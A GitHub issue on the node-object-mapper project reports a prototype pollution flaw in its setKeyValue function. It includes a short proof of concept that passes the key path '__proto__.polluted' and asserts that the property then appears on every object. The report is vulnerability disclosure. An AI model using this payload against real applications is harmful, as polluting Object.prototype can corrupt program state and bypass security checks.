node-object-mapper icon indicating copy to clipboard operation
node-object-mapper copied to clipboard
verified publisher icon wankdanker

A Potential Prototype Pollution

Open cstimkong opened this issue 4 months ago • 0 comments

I have found a potential prototype pollution of the function setKeyValue. Here is a PoC exploit:

var objectMapper = require('object-mapper');
assert(({}).polluted === undefined);
objectMapper.setKeyValue({}, '__proto__.polluted', 'yes',{});
assert(({}).polluted === 'yes');

cstimkong avatar Nov 03 '25 07:11 cstimkong